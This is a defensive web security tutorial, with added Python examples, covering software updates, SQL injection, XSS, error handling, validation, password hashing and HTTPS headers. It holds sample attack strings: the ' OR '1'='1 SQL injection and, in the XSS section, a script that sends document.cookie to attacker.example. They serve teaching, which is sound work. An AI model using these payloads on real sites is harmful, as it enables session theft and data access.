You may not think your site has anything worth being hacked for, but websites are compromised all the time. Most website breaches are not attempts to steal your data or deface your layout; they are attempts to use your server as an email relay for spam, or to set up a temporary web server, normally to serve files of an illegal nature. Other very common ways to abuse compromised machines include enrolling your servers in a botnet or using them to mine cryptocurrency. You could even be hit by ransomware.
01. Keeping Software Up-to-date
It may seem obvious, but keeping all software up to date is vital to the security of your website. This applies both to the server operating system and to any software your website runs, such as a CMS or forum. When a vulnerability is found in a piece of software, attackers start trying to exploit it almost immediately. If you are using a managed hosting solution, you don't need to worry as much about applying operating system security updates, as the hosting company should take care of this.
If you are using third-party software on your website, such as a CMS or forum, you should apply all security patches promptly. Most vendors have a mailing list or RSS feed detailing any website security issues. WordPress, Umbraco and many other CMSs notify you of available system updates when you log in.
Many developers use tools such as Composer, npm and RubyGems to manage their software dependencies, and a security vulnerability disclosed in a package you depend on but are not paying attention to is one of the easiest ways to get caught out. Keep your dependencies up to date and use a tool such as Gemnasium (or the package managers' own audit commands, such as npm audit, or a service such as Dependabot) to get automatic notifications when a vulnerability is announced in one of your components.
02. Pay attention to SQL injection
In an SQL injection attack, an attacker uses a web form field or URL parameter to gain access to or manipulate your database. When you write queries in standard Transact-SQL (or any other SQL dialect) by hand, it is easy to unknowingly insert rogue code into the query that could be used to change tables, retrieve information or delete data. You can easily prevent this by always using parameterised queries; most web languages have this feature and it is easy to implement.
Consider the following query.
"SELECT * FROM table WHERE column = '" + parameter + "';"
If an attacker changes the URL parameter to pass ' OR '1'='1, the query becomes:
"SELECT * FROM table WHERE column = '' OR '1'='1';"
Since '1' is always equal to '1', the WHERE clause is true for every row, and the same trick lets the attacker append an additional statement to the end of the query which, where the database driver allows multiple statements, will also be executed.
You can fix this query by explicitly parameterising it. For example, using PDO in PHP:
$stmt = $pdo->prepare('SELECT * FROM table WHERE column = :value');
$stmt->execute(array('value' => $parameter));
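The concatenated query from above beside its parameterised form, run against an in-memory SQLite database so the difference is visible. This is an added example rather than code from the original article; the table, the sample rows and the payload are constructed for illustration.

```python
"""Added example (not from the original article): the concatenated query
from the text beside its parameterized form, run against an in-memory
SQLite database with constructed sample rows."""
import sqlite3

# Constructed sample data: a small users table, including a row the
# attacker should not be able to see.
SAMPLE_ROWS = [
    (1, "alice", "alice@example.com"),
    (2, "bob", "bob@example.com"),
    (3, "admin", "admin@example.com"),
]


def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER, name TEXT, email TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?, ?)", SAMPLE_ROWS)
    return conn


def lookup_vulnerable(conn, name):
    """The pattern from the article: the parameter is pasted into the SQL
    text, so a quote inside it changes the structure of the query."""
    sql = "SELECT * FROM users WHERE name = '" + name + "'"
    return conn.execute(sql).fetchall()


def lookup_parameterized(conn, name):
    """Placeholder form: the driver passes the value separately from the SQL
    text, so it is compared literally and can never become SQL syntax."""
    sql = "SELECT * FROM users WHERE name = ?"
    return conn.execute(sql, (name,)).fetchall()


if __name__ == "__main__":
    conn = make_db()
    payload = "' OR '1'='1"
    print("vulnerable:    ", lookup_vulnerable(conn, payload))
    print("parameterized: ", lookup_parameterized(conn, payload))
```

With the payload from the text, the concatenated query returns every row in the table, while the parameterised query looks for a user literally named `' OR '1'='1` and returns nothing.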
03. Protect from XSS attacks
Cross-site scripting (XSS) attacks inject malicious JavaScript into your pages, which then runs in the browsers of your users and can change page content or steal information to send back to the attacker. For example, if you show comments on a page without validation, an attacker might submit a comment containing script tags and JavaScript, which could run in every other user's browser and steal their login cookie, allowing the attacker to take control of the account of every user who viewed the comment. You need to ensure that users cannot inject active JavaScript content into your pages.
This is a particular concern in modern web applications, where pages are now built primarily from user content, which in many cases generates HTML that is also interpreted by front-end frameworks such as Angular and Ember. These frameworks provide many XSS protections, but mixing server and client rendering creates new and more complicated attack avenues too: not only is injecting JavaScript into the HTML effective, but you can also inject content that will run code by inserting Angular directives or using Ember helpers.
The key here is to focus on how your user-generated content could escape the bounds you expect and be interpreted by the browser as something other than what you intended. This is similar to defending against SQL injection. When dynamically generating HTML, use functions that explicitly make the changes you're looking for (for example element.setAttribute and element.textContent, which the browser escapes automatically, rather than setting element.innerHTML by hand), or use functions in your templating tool that automatically do appropriate escaping, rather than concatenating strings or setting raw HTML content.
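To make the escaping point concrete on the server side, here is a comment renderer built by string concatenation next to one that escapes for both the element body and the attribute context. This is an added example, not code from the original article; the attacker's comment and author name are constructed, and the markup layout is an assumption.

```python
"""Added example (not from the original article): rendering a user comment
into HTML by raw concatenation, beside a version that escapes the value for
the context it is placed in. The attacker-controlled strings are constructed."""
import html

# Constructed attacker input: a script tag in the comment body, and an
# attribute-breakout attempt in the author field.
EVIL_COMMENT = '<script>fetch("https://attacker.example/?c=" + document.cookie)</script>'
EVIL_AUTHOR = 'mallory" onmouseover="alert(1)'


def render_vulnerable(author, text):
    # Raw concatenation: whatever the user typed becomes markup.
    return '<div class="comment" data-author="' + author + '">' + text + '</div>'


def render_escaped(author, text):
    # html.escape(quote=True) neutralises < > & and both quote characters,
    # so the value stays inside the attribute or element body it was put in.
    return (
        '<div class="comment" data-author="' + html.escape(author, quote=True) + '">'
        + html.escape(text)
        + '</div>'
    )


def contains_active_markup(rendered):
    """Crude check: does the output still contain a script tag or an
    injected event-handler attribute?"""
    lowered = rendered.lower()
    return "<script" in lowered or '" onmouseover=' in lowered


if __name__ == "__main__":
    print(render_vulnerable(EVIL_AUTHOR, EVIL_COMMENT))
    print(render_escaped(EVIL_AUTHOR, EVIL_COMMENT))
```

Note that the escaping has to match the context: text that is safe inside an element body is not automatically safe inside an attribute, a URL or a script block, which is why a templating engine with context-aware auto-escaping is preferable to calling an escape function by hand.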
04. Pay attention to the error message
Be careful with how much information you give away in your error messages. Show users only minimal errors, so that secrets present on your server (such as API keys or database passwords) are never revealed. Don't provide full exception details either, as these can make complex attacks such as SQL injection far easier. Keep detailed errors in your server logs and show users only the information they need.
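A request handler that follows this advice: the full exception (which here contains a connection string with a password) goes to the server log under a reference id, and the client sees only the reference. This is an added example rather than code from the original article; the database error text and the in-memory log are constructed stand-ins.

```python
"""Added example (not from the original article): log the full exception
server-side under a reference id, return only a generic message to the
client. The database error text is constructed to show what a raw message
would leak."""
import traceback
import uuid

# Constructed: the kind of message a database driver might produce,
# containing a secret the user must never see.
DB_ERROR_TEXT = "could not connect: postgres://app:S3cretPass@db.internal/prod"

SERVER_LOG = []  # stand-in for the server's log file


class DatabaseError(Exception):
    pass


def query_orders():
    raise DatabaseError(DB_ERROR_TEXT)


def handle_request():
    """Returns (status, body) as a web framework handler would."""
    try:
        return 200, query_orders()
    except Exception as exc:
        ref = uuid.uuid4().hex[:12]
        # Everything useful for debugging goes to the server log, keyed by ref.
        SERVER_LOG.append(
            f"ref={ref} {type(exc).__name__}: {exc}\n{traceback.format_exc()}"
        )
        # The client gets the reference only, never the exception text.
        return 500, f"Something went wrong. Reference: {ref}"


if __name__ == "__main__":
    status, body = handle_request()
    print(status, body)
    print("--- server log ---")
    print(SERVER_LOG[-1])
```

The reference id is what makes the generic message workable in practice: a user can quote it to support, and you can find the full stack trace in the log without ever having shown it to them.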
05. Verify on both sides
Validation should always be done both on the browser side and on the server side. The browser can catch simple failures, such as a required field left empty or text entered into a numbers-only field. These checks can be bypassed, however, so you must make sure you repeat them, and do more detailed validation, on the server side. Failing to do so could lead to malicious code or scripting code being inserted into the database, or to unwanted results on your website.
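A server-side validator for the kinds of checks the text mentions, written so that it assumes nothing about what the browser did. This is an added example, not code from the original article; the field names, limits and email pattern are assumptions for illustration.

```python
"""Added example (not from the original article): server-side validation of
a form whose client-side checks may have been bypassed. Field names and
rules are assumptions for illustration."""
import re

# Deliberately simple: enough to reject obvious junk, not a full RFC check.
EMAIL_RE = re.compile(r"^[^@\s]+@[^@\s]+\.[^@\s]+$")


def validate_order_form(form):
    """form: dict of raw string values as received from the request.
    Returns (cleaned_values, errors). Never trust that the browser checked
    anything; every rule is re-applied here."""
    errors = {}
    cleaned = {}

    name = (form.get("name") or "").strip()
    if not name:
        errors["name"] = "required"
    elif len(name) > 100:
        errors["name"] = "too long"
    else:
        cleaned["name"] = name

    email = (form.get("email") or "").strip()
    if not EMAIL_RE.match(email):
        errors["email"] = "invalid"
    else:
        cleaned["email"] = email

    qty_raw = (form.get("quantity") or "").strip()
    if not qty_raw.isdigit():  # rejects "", "12abc", "-1", "1e3", "10; DROP ..."
        errors["quantity"] = "must be a whole number"
    else:
        qty = int(qty_raw)
        if not 1 <= qty <= 1000:
            errors["quantity"] = "out of range"
        else:
            cleaned["quantity"] = qty  # downstream code gets an int, not a string

    return cleaned, errors
```

The cleaned dictionary is the only thing later code should use: it carries typed, bounded values, so a quantity can never reach a query as a string that happens to contain SQL.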
06. Check your passwords
Everyone knows they should use complex passwords, but that doesn't mean they always do. It is crucial to use strong passwords for your server and website admin area, but equally important to insist on good password practices for your users, to protect the security of their accounts.
As much as users may not like it, enforcing password requirements such as a minimum length of around eight characters will help to protect their information in the long run. Composition rules (an uppercase letter, a number) are a common way to do this, although checking new passwords against lists of known breached passwords and allowing long passphrases does more to keep weak passwords out.
Passwords should always be stored as hashed values, never in plain text or with reversible encryption. Use a purpose-built, deliberately slow password hashing function such as bcrypt, scrypt, Argon2 or PBKDF2 rather than a plain fast hash such as SHA-1 or SHA-256 on its own. With this method you never store the password itself; at login you hash what the user typed and compare it with the stored value. For extra security, salt each password with a unique random value, stored alongside the hash.
Should someone break in and steal your password hashes, they cannot be reversed, which limits the damage. The best an attacker can do is a dictionary or brute-force attack, essentially guessing every combination until one matches. With salted, slow hashes, every salt + password guess has to be hashed individually, which is computationally expensive and makes cracking a large set of passwords much slower.
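Salted, slow password hashing with the standard library, plus a constant-time comparison at login, as an added example (not code from the original article). It uses PBKDF2-HMAC-SHA256 because it ships with Python; the iteration count and storage format are assumptions, and where a library for Argon2 or bcrypt is available that is the better choice.

```python
"""Added example (not from the original article): salted, slow password
hashing with PBKDF2-HMAC-SHA256, a constant-time verify, and an unsalted
fast hash for contrast. Iteration count and storage format are assumptions."""
import hashlib
import hmac
import secrets

ITERATIONS = 600_000  # tune so one hash costs tens of milliseconds on your hardware


def hash_password(password, salt=None):
    """Return a self-describing string: algorithm$iterations$salt$digest."""
    salt = salt or secrets.token_bytes(16)  # fresh random salt per password
    digest = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, ITERATIONS)
    # Everything needed to verify later is stored; none of it is secret.
    return f"pbkdf2_sha256${ITERATIONS}${salt.hex()}${digest.hex()}"


def verify_password(password, stored):
    """Recompute with the stored salt and iteration count, compare in
    constant time so the comparison does not leak where digests diverge."""
    algo, iters, salt_hex, digest_hex = stored.split("$")
    if algo != "pbkdf2_sha256":
        raise ValueError("unknown hash format")
    candidate = hashlib.pbkdf2_hmac(
        "sha256", password.encode(), bytes.fromhex(salt_hex), int(iters)
    )
    return hmac.compare_digest(candidate, bytes.fromhex(digest_hex))


def unsalted_fast_hash(password):
    """What NOT to do, for contrast: identical passwords give identical
    values, so one cracked hash or a precomputed table unlocks every account
    that shares the password, and SHA-256 is fast enough to guess billions
    of candidates per second on a GPU."""
    return hashlib.sha256(password.encode()).hexdigest()


if __name__ == "__main__":
    stored = hash_password("correct horse battery staple")
    print(stored)
    print(verify_password("correct horse battery staple", stored))
    print(verify_password("wrong password", stored))
```

Storing the iteration count with each hash lets you raise the cost later and re-hash users' passwords at their next successful login, without invalidating existing accounts.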
07. Use HTTPS
HTTPS is a protocol used to provide security over the Internet. HTTPS guarantees that users are talking to the server they expect, and that nobody else can intercept or change the content they are seeing while it is in transit.
If you have anything that your users might want to keep private, it is highly advisable to use only HTTPS to deliver it. That of course means credit card and login pages (and the URLs they submit to), but typically far more of your site too. A login form will often set a cookie, for example, which is sent with every other request a logged-in user makes to your site and is used to authenticate those requests. An attacker who steals that cookie could impersonate the user completely and take over their login session. To defeat these kinds of attacks, you almost always want to use HTTPS for your entire site.
That is no longer as tricky or expensive as it once was. Let's Encrypt provides totally free and automated certificates, which you need in order to enable HTTPS, and there are community tools available for a wide range of common platforms and frameworks to set this up for you automatically. Notably, Google has announced that using HTTPS counts in your favour in its search rankings, giving this an SEO benefit too. Insecure HTTP is on its way out, and now is the time to upgrade.
Already using HTTPS everywhere? Go further and look at setting up HTTP Strict Transport Security (HSTS), an easy header you can add to your server responses to disallow insecure HTTP for your entire domain. Browsers remember the policy for the max-age you specify, so start with a short max-age while you confirm every host covered by the policy serves HTTPS correctly, then raise it.
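A small audit of the response headers this section is about: it checks that an HSTS policy is present with a max-age of at least a year and includeSubDomains, and that cookies (such as the session cookie discussed above) are marked Secure and HttpOnly. This is an added example, not code from the original article; the two header sets are constructed and the one-year threshold is an assumption.

```python
"""Added example (not from the original article): audit a response's headers
for an HSTS policy with a long max-age, and for Secure/HttpOnly on cookies.
The header sets are constructed; the thresholds are assumptions."""

ONE_YEAR = 31_536_000  # seconds

# Constructed: the same response before and after hardening.
WEAK_HEADERS = [
    ("Content-Type", "text/html"),
    ("Set-Cookie", "session=abc123; Path=/"),
]
HARDENED_HEADERS = [
    ("Content-Type", "text/html"),
    ("Strict-Transport-Security", "max-age=63072000; includeSubDomains; preload"),
    ("Set-Cookie", "session=abc123; Path=/; Secure; HttpOnly; SameSite=Lax"),
]


def parse_hsts(value):
    """Return a dict of directives from an HSTS header value.
    Directive names are case-insensitive; values may be quoted."""
    directives = {}
    for part in value.split(";"):
        part = part.strip()
        if not part:
            continue
        name, _, val = part.partition("=")
        directives[name.strip().lower()] = val.strip().strip('"')
    return directives


def audit_headers(headers):
    """headers: list of (name, value) pairs as sent by the server.
    Returns a list of findings; an empty list means nothing was flagged."""
    findings = []

    hsts = [v for n, v in headers if n.lower() == "strict-transport-security"]
    if not hsts:
        findings.append("no Strict-Transport-Security header")
    else:
        d = parse_hsts(hsts[0])
        max_age_raw = d.get("max-age", "")
        max_age = int(max_age_raw) if max_age_raw.isdigit() else 0
        if max_age < ONE_YEAR:
            findings.append(f"HSTS max-age {max_age} is below one year")
        if "includesubdomains" not in d:
            findings.append("HSTS lacks includeSubDomains")

    for n, v in headers:
        if n.lower() != "set-cookie":
            continue
        cookie_name = v.split("=", 1)[0].strip()
        attrs = {a.strip().lower() for a in v.split(";")[1:]}
        if "secure" not in attrs:
            findings.append(f"cookie {cookie_name} lacks Secure")
        if "httponly" not in attrs:
            findings.append(f"cookie {cookie_name} lacks HttpOnly")

    return findings


if __name__ == "__main__":
    print("weak:    ", audit_headers(WEAK_HEADERS))
    print("hardened:", audit_headers(HARDENED_HEADERS))
```

The Secure flag is what actually stops the cookie-theft scenario described earlier once the site is on HTTPS: without it, a browser will still send the session cookie over a plain-HTTP request to the same host, HSTS or not, if the policy has expired or was never seen.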